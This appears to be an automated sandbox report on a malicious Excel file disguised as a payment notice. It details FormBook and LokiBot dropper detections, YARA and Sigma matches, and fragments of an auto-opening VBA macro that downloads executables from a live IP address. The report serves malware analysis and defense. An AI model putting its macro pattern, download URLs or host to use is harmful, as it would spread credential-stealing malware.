 Sample Name: Payment_Notification.pdf.csv MD5: 86a9322007f88be40e4034ebc7368248 SHA1: 522d6e7b2a55e1358072792065219ef71ac8992d SHA256: fdfe1dc9c8056c69e4cb2b5370db0a4c3797b3ad375fe1039a19ce269bbb0c78

Detection

 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected Generic Dropper
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Sigma detected: Microsoft Office Product Spawning Windows Shell
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Malware Configuration

No configs have been found
Source | Rule | Description | Author | Strings

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp
Rule: EXP_potential_CVE_2017_11882
Description: unknown
Author: ReversingLabs
Strings:
• 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
• 0x580:$equation1: Equation Native
• 0x8e6:$cmd: cmd
• 0x912:$address: 12 0C 43 00

Source | Rule | Description | Author | Strings

Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
• 0xd7d8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
• 0xe020:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
• 0x157d9:$sqlite3step: 68 34 1C 7B E1
• 0x158ec:$sqlite3step: 68 34 1C 7B E1
• 0x15808:$sqlite3text: 68 38 2A 90 C5
• 0x1592d:$sqlite3text: 68 38 2A 90 C5
• 0x1581b:$sqlite3blob: 68 53 D8 7F 8C
• 0x15943:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
• 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x74c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x12b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x12641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x12c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x12dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x804a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x118bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x89e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17ec7:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x18eca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell
 Source: Process started
 Author: Michael Haag, Florian Roth, Markus Neis
 Data:
   Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
   CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
   CommandLine|base64offset|contains: 
   Image: C:\Windows\SysWOW64\cscript.exe
   NewProcessName: C:\Windows\SysWOW64\cscript.exe
   OriginalFileName: C:\Windows\SysWOW64\cscript.exe
   ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv'
   ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
   ParentProcessId: 3068
   ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
   ProcessId: 4928

Signature Overview

AV Detection:

 Yara detected FormBook
 Source: Yara match File source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY
 Machine Learning detection for sample
 Source: Payment_Notification.pdf.csv Joe Sandbox ML: detected

Software Vulnerabilities:

 Document exploit detected (process start blacklist hit)

 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
 Date: Thu, 14 May 2020 11:47:34 GMT
 Server: Apache/2.4.41 (Ubuntu)
 Last-Modified: Wed, 13 May 2020 21:57:20 GMT
 ETag: "15000-5a58eaa05d000"
 Accept-Ranges: bytes
 Content-Length: 86016
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: application/x-msdos-program
 Uses a known web browser user agent for HTTP communication
 Source: global traffic HTTP traffic detected: GET /stream/tmp.exe HTTP/1.1
 Connection: Keep-Alive
 Accept: */*
 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
 Host: 5.206.224.171
 Source: global traffic HTTP traffic detected: GET /stream/dali.bin HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
 Host: 5.206.224.171
 Cache-Control: no-cache
 Connects to IPs without corresponding DNS lookups
 Source: unknown TCP traffic detected without corresponding DNS query: 5.206.224.171
 Found strings which match to known social media urls
 Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook)
 Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico equals www.myspace.com (Myspace)
 Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico equals www.rambler.ru (Rambler)
 Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
 Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler)
 Urls found in memory or binary data

E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY

System Summary:

 Malicious sample detected (through community Yara rule)
 Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
 Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
 Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000004.00000003.1121082322.00000000037FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
 Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
 Document contains an embedded VBA macro which may execute processes
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: Shell "type NUL > " + TXTFile
 Document contains an embedded VBA macro with suspicious strings
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = ""WScript""" + vbCrLf
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = sWScript + "".""" + vbCrLf
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " m = sWScript + ""Sh""" + vbCrLf
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" " + vbCrLf
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )" + vbCrLf
 Document contains an embedded VBA with functions possibly related to ADO stream file operations
 Microsoft Office drops suspicious files
 Contains functionality to call native functions
 Detected potential crypto function
 Document contains an embedded VBA macro which executes code when the document is opened / closed
 Source: Payment_Notification.pdf.csv OLE, VBA macro line: Sub Auto_Open()
 Found potential string decryption / allocating functions
 Source: C:\ProgramData\tmp.exe Code function: String function: 1F18B0E0 appears 176 times
 Source: C:\ProgramData\tmp.exe Code function: String function: 1F1DDDE8 appears 48 times
 Source: C:\ProgramData\tmp.exe Code function: String function: 1F215110 appears 38 times
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winCSV@10/12@0/1
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_01
 Creates temporary files
 Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{DEC44A8B-235A-499E-84E6-942C660EF40C} - OProcSessId.dat
 Executes visual basic scripts
 Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
 Parts of this application are using VB runtime library 6.0 (probably coded in Visual Basic)
 Spawns processes
 Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv'
 Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
 Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
 Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: unknown Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
 Source: unknown Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
 Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
 Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
 Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
 Source: C:\ProgramData\tmp.exe Process created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
 Uses an in-process (OLE) Automation server